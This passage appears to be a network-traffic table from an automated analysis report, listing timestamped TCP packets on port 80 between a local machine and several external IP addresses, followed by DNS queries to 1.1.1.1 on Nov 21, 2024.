                                                                                                                    Nov 21, 2024 16:59:21.667408943 CET8050006209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:21.667519093 CET5000680192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:21.929915905 CET5000680192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:22.949884892 CET5001280192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:23.069633007 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.071320057 CET5001280192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:23.091801882 CET5001280192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:23.211735010 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.211754084 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.211906910 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.211946011 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.212042093 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.212124109 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.212141037 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.212212086 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:23.212265015 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:24.374104023 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:24.374272108 CET8050012209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:24.374330997 CET5001280192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:24.601804018 CET5001280192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:25.620781898 CET5001980192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:25.747486115 CET8050019209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:25.747654915 CET5001980192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:25.759254932 CET5001980192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:25.881697893 CET8050019209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:27.115638018 CET8050019209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:27.117960930 CET8050019209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:27.118176937 CET5001980192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:27.120132923 CET5001980192.168.2.4209.74.77.109
                                                                                                                    Nov 21, 2024 16:59:27.240132093 CET8050019209.74.77.109192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:32.483031034 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:32.602695942 CET8050035161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:32.602828026 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:32.620309114 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:32.740026951 CET8050035161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:33.860104084 CET8050035161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:33.860119104 CET8050035161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:33.860255003 CET8050035161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:33.860308886 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:33.860389948 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:34.133630991 CET5003580192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:35.152795076 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:35.272356033 CET8050040161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:35.272449017 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:35.292800903 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:35.412609100 CET8050040161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:36.573849916 CET8050040161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:36.573863983 CET8050040161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:36.573980093 CET8050040161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:36.574013948 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:36.574013948 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:36.804930925 CET5004080192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:37.823368073 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:37.942886114 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:37.942977905 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:37.958981991 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:38.078679085 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.078700066 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.078845024 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.078888893 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.079010010 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.079057932 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.079266071 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.079281092 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:38.079441071 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:39.284393072 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:39.284473896 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:39.284674883 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:39.293627977 CET8050041161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:39.293760061 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:39.461210012 CET5004180192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:40.480412960 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:40.601177931 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:40.601264954 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:40.611195087 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:40.731128931 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:41.917891979 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:41.917920113 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:41.917938948 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:41.917953968 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:41.918101072 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:41.918858051 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:41.927567959 CET5004280192.168.2.4161.97.142.144
                                                                                                                    Nov 21, 2024 16:59:42.047214985 CET8050042161.97.142.144192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:47.077558041 CET5004380192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:47.197438002 CET8050043185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:47.197547913 CET5004380192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:47.212202072 CET5004380192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:47.338233948 CET8050043185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:48.452073097 CET8050043185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:48.452224016 CET8050043185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:48.452286959 CET5004380192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:48.726824045 CET5004380192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:49.745520115 CET5004480192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:49.865504980 CET8050044185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:49.868968964 CET5004480192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:49.883474112 CET5004480192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:50.003143072 CET8050044185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:51.165776014 CET8050044185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:51.166089058 CET8050044185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:51.166393042 CET5004480192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:51.398742914 CET5004480192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:52.417380095 CET5004580192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:52.541512012 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.541608095 CET5004580192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:52.557588100 CET5004580192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:52.677747965 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677782059 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677814960 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677829027 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677855015 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677870989 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677930117 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677942991 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:52.677962065 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:53.839373112 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:53.839752913 CET8050045185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:53.839812040 CET5004580192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:54.070607901 CET5004580192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:55.090260983 CET5004680192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:55.211805105 CET8050046185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:55.211980104 CET5004680192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:55.222924948 CET5004680192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:55.342549086 CET8050046185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:56.552670956 CET8050046185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:56.552872896 CET8050046185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:56.552946091 CET5004680192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:56.555938959 CET5004680192.168.2.4185.27.134.206
                                                                                                                    Nov 21, 2024 16:59:56.675699949 CET8050046185.27.134.206192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:01.724539995 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:01.844918966 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:01.845170975 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:01.859453917 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:01.979381084 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:03.140626907 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:03.140652895 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:03.140800953 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:03.141540051 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:03.141642094 CET8050047172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:03.143925905 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:03.367585897 CET5004780192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:04.389514923 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:04.509491920 CET8050048172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:04.509630919 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:04.526108027 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:04.645653009 CET8050048172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:05.855931997 CET8050048172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:05.855962038 CET8050048172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:05.856075048 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:05.856997013 CET8050048172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:05.857073069 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:06.040870905 CET5004880192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:07.058502913 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:07.178097963 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.179044962 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:07.199527979 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:07.319456100 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319474936 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319484949 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319494963 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319629908 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319638968 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319648027 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319942951 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:07.319953918 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:08.558829069 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:08.558856010 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:08.558945894 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:08.560128927 CET8050049172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:08.560188055 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:08.711241007 CET5004980192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:09.730345964 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:09.849910975 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:09.852972984 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:09.864921093 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:09.984783888 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:11.151949883 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:11.151974916 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:11.152337074 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:11.153048038 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:11.153201103 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:11.155044079 CET5005080192.168.2.4172.67.138.37
                                                                                                                    Nov 21, 2024 17:00:11.274766922 CET8050050172.67.138.37192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:16.473663092 CET5005180192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:16.595834017 CET8050051104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:16.595925093 CET5005180192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:16.610748053 CET5005180192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:16.876043081 CET8050051104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:18.062515974 CET8050051104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:18.062877893 CET8050051104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:18.063014984 CET5005180192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:18.118961096 CET5005180192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:19.136378050 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:19.259638071 CET8050052104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:19.259851933 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:19.280884027 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:19.402945042 CET8050052104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:20.508363962 CET8050052104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:20.509835005 CET8050052104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:20.509884119 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:20.510026932 CET8050052104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:20.510072947 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:20.789361000 CET5005280192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:21.807955027 CET5005380192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:21.928224087 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:21.928365946 CET5005380192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:21.944026947 CET5005380192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:22.063710928 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.063723087 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.063741922 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.063752890 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.063886881 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.063911915 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.064085960 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.064197063 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:22.064207077 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:23.178004026 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:23.179469109 CET8050053104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:23.179647923 CET5005380192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:23.446994066 CET5005380192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:24.464245081 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:24.587079048 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:24.587167025 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:24.600445986 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:24.719964981 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:25.873050928 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:25.873084068 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:25.873265982 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:25.877244949 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:25.877343893 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:25.878273964 CET5005480192.168.2.4104.21.58.90
                                                                                                                    Nov 21, 2024 17:00:26.007127047 CET8050054104.21.58.90192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:31.248049021 CET5005580192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:31.369616985 CET8050055172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:31.369735003 CET5005580192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:31.391370058 CET5005580192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:31.652874947 CET8050055172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:32.687391996 CET8050055172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:32.687558889 CET8050055172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:32.687684059 CET5005580192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:32.898935080 CET5005580192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:33.919843912 CET5005680192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:34.050538063 CET8050056172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:34.050647974 CET5005680192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:34.072432995 CET5005680192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:34.191967964 CET8050056172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:35.263382912 CET8050056172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:35.263858080 CET8050056172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:35.265114069 CET5005680192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:35.586302042 CET5005680192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:36.605653048 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:36.725193977 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.725285053 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:36.743305922 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:36.743359089 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:36.863411903 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863432884 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863492012 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863543987 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863641977 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863648891 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863746881 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863785028 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:36.863838911 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:37.857378960 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:37.858133078 CET8050057172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:37.858254910 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:38.258162975 CET5005780192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:39.282632113 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:39.402961016 CET8050058172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:39.403085947 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:39.412111044 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:39.533694983 CET8050058172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:40.596328020 CET8050058172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:40.596507072 CET8050058172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:40.596662045 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:40.596827030 CET8050058172.67.192.207192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:40.596890926 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:40.599843025 CET5005880192.168.2.4172.67.192.207
                                                                                                                    Nov 21, 2024 17:00:40.719345093 CET8050058172.67.192.207192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 21, 2024 16:57:00.503331900 CET5481353192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:57:00.641122103 CET53548131.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:17.479674101 CET6122453192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:57:17.707570076 CET53612241.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:32.419053078 CET5411653192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:57:32.558857918 CET53541161.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:46.917448044 CET6058653192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:57:47.055114031 CET53605861.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:58:01.870594025 CET5496853192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:58:02.011957884 CET53549681.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:58:16.528772116 CET5372853192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:58:16.917889118 CET53537281.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:58:31.668128014 CET6247553192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:58:31.806478024 CET53624751.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:58:47.652833939 CET6130453192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:58:48.054840088 CET53613041.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:02.777365923 CET6429353192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:59:02.923151016 CET53642931.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:17.280776978 CET6446953192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:59:17.600111961 CET53644691.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:32.136663914 CET5788453192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:59:32.480237007 CET53578841.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 16:59:46.933824062 CET6164353192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 16:59:47.071213961 CET53616431.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:01.576854944 CET5683453192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 17:00:01.722011089 CET53568341.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:16.168498993 CET5717353192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 17:00:16.471065998 CET53571731.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:30.887017012 CET5459453192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 17:00:31.224958897 CET53545941.1.1.1192.168.2.4
                                                                                                                    Nov 21, 2024 17:00:45.980561972 CET6146253192.168.2.41.1.1.1
                                                                                                                    Nov 21, 2024 17:00:46.909383059 CET53614621.1.1.1192.168.2.4

